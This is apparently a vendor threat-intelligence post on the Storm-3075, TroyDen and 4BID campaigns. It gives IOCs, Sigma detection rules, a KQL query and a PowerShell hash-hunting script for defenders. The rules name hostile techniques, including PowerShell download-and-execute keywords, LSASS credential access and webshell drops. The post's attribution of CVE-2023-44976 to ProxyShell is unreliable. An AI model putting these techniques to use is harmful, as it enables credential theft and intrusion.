Back to Intelligence

Storm-3075 AI Hype, TroyDen GitHub Lures & 4BID ProxyShell: OTX Pulse Analysis — Enterprise Detection Pack

SA
Security Arsenal Team
June 9, 2026
6 min read

Live OTX pulse data from 2026-06-09 highlights three concurrent high-risk campaigns distinct in targeting yet unified in their exploitation of current trends and infrastructure vulnerabilities.

  1. Storm-3075 (AI Brand Impersonation): This adversary is aggressively capitalizing on the AI boom, impersonating brands like ChatGPT and Claude to distribute the Vidar and Lumma Stealer families. The attack chain utilizes malvertising and SEO poisoning to funnel victims to infrastructure hosting the Hijack Loader, which ultimately deploys credential stealers and the GhostSocks backdoor.

  2. TroyDen (Lure Factory): Targeting developers and gamers, this group leverages AI-generated lure names (using biological taxonomy) to distribute LuaJIT-based payloads via GitHub repositories. These packages deliver Redline and LummaStealer using a two-component payload structure designed to evade static analysis.

  3. 4BID (Geopolitical Hacktivism): Moving beyond simple political defacements, this hacktivist collective is exploiting ProxyShell vulnerabilities (specifically CVE-2023-44976) against Microsoft Exchange servers. Successful exploitation leads to web shells (fd.aspx) and the deployment of sophisticated post-exploitation frameworks including Sliver, Havoc, and Mythic Apollo against government and healthcare entities in Eastern Europe and the Middle East.

Threat Actor / Malware Profile

Storm-3075

  • Distribution: Malvertising campaigns and SEO poisoning targeting AI-related searches.
  • Payload Behavior: Uses Hijack Loader to execute shellcode, decrypting and loading Vidar (information stealer) and Lumma Stealer. Also deploys GhostSocks for proxy/tunneling.
  • C2 Communication: HTTP/HTTPS based communication to hardcoded domains (e.g., brokeapt.com).
  • Persistence: Likely via scheduled tasks or registry run keys established by the loader.

TroyDen

  • Distribution: GitHub repositories mimicking legitimate tools with obscure, AI-generated biological names.
  • Payload Behavior: LuaJIT based loaders that employ Prometheus Obfuscator. The payload steals crypto wallets, browser data, and system info.
  • Anti-Analysis: Heavy use of obfuscation and two-component payloads to separate the dropper from the core logic.

4BID

  • Distribution: Exploitation of on-premises Microsoft Exchange servers via ProxyShell.
  • Payload Behavior: Deploys fd.aspx webshells for initial access, followed by C2 frameworks (Sliver, Havoc) for lateral movement. Utilizes ValleyRAT and BYOVD (Bring Your Own Vulnerable Driver) techniques to bypass security.
  • Persistence: Webshell access and service installation.

IOC Analysis

The provided indicators span multiple categories requiring immediate operationalization:

  • Domains & Hostnames: brokeapt.com, pan.rongtv.xyz. These should be blocked at the DNS level and added to web proxy blocklists.
  • IPv4 Addresses: 185.221.153.121, 45.112.194.82 (associated with 4BID C2). These require immediate firewall blocking.
  • File Hashes:
    • SHA256: 0a26238f6c516de5885457c93042531aa59bc206a9537cebf5267cedc6c68531 (Storm-3075 Payload)
    • MD5: 008cd423ca45134d3343f66cced1d104 (4BID/Havoc Component)
  • CVEs: CVE-2023-44976 (ProxyShell variant). Patch validation is critical for Exchange environments.

Tooling: SOC teams should load these hashes into EDR solutions (CrowdStrike, SentinelOne) and use threat intelligence platforms (MISP, Anomali) to correlate with internal logs.

Detection Engineering

YAML
title: Potential ProxyShell Exchange Server Exploitation
id: 6bba01ad-860a-4b15-89c2-d590f6c6c5a4
status: experimental
description: Detects patterns associated with ProxyShell exploitation on Exchange servers, specifically focusing on the creation of web shells and backend processes spawning cmd.
references:
    - https://www.microsoft.com/security/blog/
author: Security Arsenal
date: 2026/06/09
tags:
    - attack.initial_access
    - attack.t1190
    - cve.2023.44976
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 5145
        ShareName|contains: 'Exchange'
        RelativeTargetName|contains: '.aspx'
    condition: selection
falsepositives:
    - Legitimate administrative access
level: critical
---
title: Credential Theft via LSASS Access by Suspicious Binary
id: a9c2d3e4-5f6a-4b8c-9d1e-2f3a4b5c6d7e
status: experimental
description: Detects potential Vidar or Lumma Stealer activity via unauthorized access to LSASS memory, often triggered by Hijack Loader.
author: Security Arsenal
date: 2026/06/09
tags:
    - attack.credential_access
    - attack.t1003.001
logsource:
    product: windows
    category: process_access
detection:
    selection:
        TargetImage|endswith: '\lsass.exe'
        GrantedAccess: '0x1010'
        SourceImage|contains:
            - '\AppData\Local\Temp'
            - '\Users\Public\'
    condition: selection
falsepositives:
    - Antivirus scanning
    - Backup software
level: high
---
title: Suspicious PowerShell Download from AI-Themed Domains
id: b1e2c3d4-5e6f-7a8b-9c0d-1e2f3a4b5c6d
status: experimental
description: Detects PowerShell commands downloading content from domains mimicking AI services, associated with Storm-3075 campaigns.
author: Security Arsenal
date: 2026/06/09
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - 'Invoke-WebRequest'
            - 'DownloadString'
            - 'IEX'
        CommandLine|contains:
            - 'chatgpt'
            - 'copilot'
            - 'deepseek'
            - 'claude'
    condition: selection
falsepositives:
    - Legitimate administrative scripts
level: medium

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for network connections to known Storm-3075 and 4BID infrastructure
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in ("brokeapt.com", "pan.rongtv.xyz", "pan.ssffaa19.xyz") 
   or RemoteIP in ("185.221.153.121", "45.112.194.82", "138.226.236.52")
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, RemoteUrl, RemoteIP, RemotePort
| extend FullURL = iff(isnotempty(RemoteUrl), strcat("scheme://", RemoteUrl, ":", RemotePort), RemoteIP)

PowerShell Hunt Script

PowerShell
# IOC Hunt Script for Storm-3075 and 4BID Indicators
# Requires Admin Privileges

Write-Host "Starting Hunt for OTX Pulse Indicators..." -ForegroundColor Cyan

# Define IOCs from Pulses
$targetHashes = @(
    "0a26238f6c516de5885457c93042531aa59bc206a9537cebf5267cedc6c68531",
    "25270cc429ada8028b5b33220ed412c47907ecceea7377d608fac5af01bed56a",
    "5455341ed1bbe75a664fca2dd0794c508e1874f75360253a7ff5bc119bc92d80",
    "56d722b0331bf0aaa86bb37483486c6dff6ad9427fc473ed7c3226c21a9bdd23"
)

$targetMD5 = @(
    "008cd423ca45134d3343f66cced1d104",
    "038cab0c60c53cf12f048272014024c0",
    "06bed0a0906e52c764b3b7016d6a4428"
)

# Scan for SHA256 Hashes
Write-Host "Scanning for SHA256 Payloads..." -ForegroundColor Yellow
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue | 
    Where-Object { !$_.PSIsContainer } | 
    ForEach-Object { 
        $hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        if ($targetHashes -contains $hash) { 
            Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
        }
    }

# Scan for MD5 Hashes (Common in 4BID campaigns)
Write-Host "Scanning for MD5 Payloads..." -ForegroundColor Yellow
Get-ChildItem -Path "C:\ProgramData" -Recurse -ErrorAction SilentlyContinue | 
    Where-Object { !$_.PSIsContainer } | 
    ForEach-Object { 
        $hash = (Get-FileHash -Path $_.FullName -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
        if ($targetMD5 -contains $hash) { 
            Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName)" -ForegroundColor Red
        }
    }

# Check for suspicious Scheduled Tasks (Common for Hijack Loader)
Write-Host "Checking Suspicious Scheduled Tasks..." -ForegroundColor Yellow
Get-ScheduledTask | Where-Object { $_.Actions.Execute -like "*powershell*" -or $_.Actions.Execute -like "*cmd*" } | 
    Select-Object TaskName, TaskPath, State, Actions

Write-Host "Hunt Complete." -ForegroundColor Green


---

Response Priorities

  • Immediate:

    • Block all IOCs (Domains brokeapt.com, rongtv.xyz; IPs 185.221.153.121, 45.112.194.82) at perimeter firewalls and proxies.
    • Scan endpoints for the listed file hashes (SHA256/MD5).
    • Isolate hosts exhibiting ProxyShell exploit patterns or Sliver C2 traffic.

  • 24 Hours:

    • Initiate credential reset for users who may have interacted with AI-themed phishing or malvertising (Storm-3075).
    • Investigate Exchange server logs for fd.aspx creation or unusual backend processes.
    • Review GitHub repository access logs for developers (TroyDen targeting).

  • 1 Week:

    • Patch Microsoft Exchange servers to mitigate CVE-2023-44976 (ProxyShell).
    • Implement application controls to block unsigned binaries in C:\ProgramData and \AppData\Local\Temp.
    • Conduct security awareness training specifically focusing on AI-themed social engineering and malvertising.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-aptlumma-stealervidar-stealerproxyshell-exploithacktivismai-social-engineering

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action